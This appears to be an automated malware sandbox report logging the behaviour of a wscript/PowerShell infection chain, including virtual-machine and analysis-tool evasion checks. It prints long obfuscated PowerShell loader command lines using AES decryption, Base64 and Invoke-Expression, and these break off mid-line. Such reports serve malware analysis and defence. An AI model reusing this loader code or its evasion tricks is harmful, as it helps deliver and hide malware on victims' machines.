                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (80 identical entries)

                      Malware Analysis System Evasion

                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE%HTTPDEBUGGERUI.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE%HTTPANALYZERV7.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESS.EXE#PROCESSHACKER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (7 identical entries)
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6928
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2941
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7779
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1935
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8689
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 969
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4307
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1955
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4561
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1166
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420 Thread sleep count: 6928 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 Thread sleep count: 2941 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2216 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2096 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (4 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (7 identical entries)
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA 3D
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Video
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                      Source: powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.Noney*
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MDF5Z6ZO?Microsoft Basic Display Adapter/Microsoft Hyper-V Video
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.None7adc3
                      Source: powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.Noney*
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA423000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW -%SystemRoot%\system32\mswsock.dllGkWQGkWOGkW4GkW=GkW[GkWRGkWeGkWfGkWlGkWeGkWcGkWtGkWiGkWoGkWnGkW.GkWAGkWsGkWsGkWeGkWmGkWbGkWlGkWyGkW]GkW:GkW:GkWLGkWoGkWaGkWdGkW(GkW[GkWbGkWyGkWtGkWeGkW[GkW]GkW]GkW$GkWIGkW9GkWCGkWGGkWVGkW)GkW'.Replace('GkW', ''); $qYlCF = $EHQ
                      Source: powershell.exe, 00000008.00000002.2791146764.000002255F828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWRL%SystemRoot%\system32\mswsock.dllRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5968
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction 